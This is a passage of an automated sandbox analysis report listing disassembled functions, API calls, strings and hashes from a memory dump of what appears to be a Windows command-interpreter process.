                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E9448378
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E944839A
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94483AE
                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94483E6
                                                                                                                                                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448403
                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448418
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                                                                                        • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                                                                        • API String ID: 3637805771-3100821235
                                                                                                                                                                        • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                                                                                        • Instruction ID: 64c141f5960ffc301e84fbf8ddf36efad37f035086e6f1b72eb1c9e0130c0058
                                                                                                                                                                        • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                                                                                        • Instruction Fuzzy Hash: 73E19273A18652CAE7109F65E4042BD7AA1FF49B95B448231DD1E93790EF3EA40DCB09
                                                                                                                                                                        Function 00007FF6E9427650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                                                                                                        • String ID: DPATH
                                                                                                                                                                        • API String ID: 95024817-2010427443
                                                                                                                                                                        • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                                                                                                        • Instruction ID: 94554807d9b7b6c50fe2ad7252fc9aaa1b388e8b76f07caf872351eee5fdb1e0
                                                                                                                                                                        • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                                                                                                        • Instruction Fuzzy Hash: BD12C273A18686C6EB648F21A440279B7E1FF89B54F444239EA4ED3794DF3EE409CB05
                                                                                                                                                                        Function 00007FF6E9426EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                                                                                                                        • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                                                                        • API String ID: 1795611712-3662956551
                                                                                                                                                                        • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                                                                        • Instruction ID: 21253b5ab56a8772e7899d5345f59ae2062f679e01beaf10c1c7c9d0614be432
                                                                                                                                                                        • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                                                                        • Instruction Fuzzy Hash: 71E19C73A08646C6EB209F64A8443FD66A1BF88788F544132DA0EC7795DE3EE50DC74A
                                                                                                                                                                        Function 00007FF6E944EE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcsupr.MSVCRT ref: 00007FF6E944EF33
                                                                                                                                                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944EF98
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944EFA9
                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944EFBF
                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6E944EFDC
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944EFED
                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F003
                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F022
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F083
                                                                                                                                                                        • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F092
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F0A5
                                                                                                                                                                        • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF6E944F0DB
                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F135
                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F16C
                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F185
                                                                                                                                                                          • Part of subcall function 00007FF6E94301B8: _get_osfhandle.MSVCRT ref: 00007FF6E94301C4
                                                                                                                                                                          • Part of subcall function 00007FF6E94301B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E94301D6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                                                                        • String ID: <noalias>$CMD.EXE
                                                                                                                                                                        • API String ID: 1161012917-1690691951
                                                                                                                                                                        • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                                                                        • Instruction ID: 0a4195b632bf2243f85b50ace29cecfcafb1a5084cfe2153f0882de2ec3b86ec
                                                                                                                                                                        • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                                                                        • Instruction Fuzzy Hash: EE919123F08652CAFB159F60E8102BD6AA0AF49B59F448135DD0E827D5DF3EA84EC716
                                                                                                                                                                        Function 00007FF6E9421560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                                                                                                        • String ID: \\?\
                                                                                                                                                                        • API String ID: 628682198-4282027825
                                                                                                                                                                        • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                                                                                                                                                        • Instruction ID: 8b23b2eca7631305e547478c69c4c8f33402ff62c3f9f3d7d4656906ec964833
                                                                                                                                                                        • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                                                                                                                                                        • Instruction Fuzzy Hash: 85E18C63A08682D6EB649F64D8943F963A0FF89749F404139DA0EC77D4EE3EE649C305
                                                                                                                                                                        Function 00007FF6E942372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                                                                                        • String ID: COPYCMD$\
                                                                                                                                                                        • API String ID: 3989487059-1802776761
                                                                                                                                                                        • Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                                                                                                        • Instruction ID: b19c15e80af4c31c34c67f2e6d59da32a5621f205c47d1eac8ce32fe79076bd4
                                                                                                                                                                        • Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                                                                                                        • Instruction Fuzzy Hash: 31F1C067A08786C2EB249F2594043BA67B0FF59B88F048135DE4EC7795EE3EE049C706
                                                                                                                                                                        Function 00007FF6E9433140 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 229timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                                                                                        • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                                                                                                        • API String ID: 55602301-2548490036
                                                                                                                                                                        • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                                                                        • Instruction ID: ff955b42c9620b9a1095b925c3c17963fba24564c9da0eb7068c19b3b3e7b10c
                                                                                                                                                                        • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                                                                        • Instruction Fuzzy Hash: E6A1AE33A19642D6EB20CF70E4483BA67A1FF94754F904136EA4E87694EF3DE548C70A
                                                                                                                                                                        Function 00007FF6E9451538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3935429995-0
                                                                                                                                                                        • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                                                                        • Instruction ID: 38be0df2807263b075c5f66a05abc3329269bacd6d4fc801395c7ccb26dabb62
                                                                                                                                                                        • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                                                                        • Instruction Fuzzy Hash: 8261DE67A18792C2E714DFA6A404679BBA1FF89F54F058134EE4A837A0EF3ED409C705
                                                                                                                                                                        Function 00007FF6E9423D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                                                                                        • String ID: %9d
                                                                                                                                                                        • API String ID: 1006866328-2241623522
                                                                                                                                                                        • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                                                                        • Instruction ID: 5de523657d9d39235c7ccb5d27c298c0ac1b0d665695a56d3b5033985c4b3d11
                                                                                                                                                                        • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                                                                        • Instruction Fuzzy Hash: 94515CB3A18642CAE700CF61A8406A83BB4FF44754F404635DA6DD77A5DF7EA548CB0A
                                                                                                                                                                        Function 00007FF6E942D250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp
                                                                                                                                                                        • String ID: GeToken: (%x) '%s'
                                                                                                                                                                        • API String ID: 2081463915-1994581435
                                                                                                                                                                        • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                                                                        • Instruction ID: f184d66e61f572ce9ea4a638f1b849d773b83185327a965e805fffd4258319ee
                                                                                                                                                                        • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                                                                        • Instruction Fuzzy Hash: 5E717763E0C686C5FB64AF64A84837A22E0BF11754F544539D90EC76E1EF3EA48DC34A
                                                                                                                                                                        Function 00007FF6E94302A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp$iswspacewcschr
                                                                                                                                                                        • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                                                                        • API String ID: 840959033-3627297882
                                                                                                                                                                        • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                        • Instruction ID: c7aeab089b9f7628b17573abfa337ace0854aa88f9e5d843b40646b6c30570bb
                                                                                                                                                                        • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                        • Instruction Fuzzy Hash: 10D14563A08647C6FB10AF71A8493B927A1BF44B44F448035DA4EC63A5EE3EE44DC71A
                                                                                                                                                                        Function 00007FF6E94232B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: _get_osfhandle.MSVCRT ref: 00007FF6E9433584
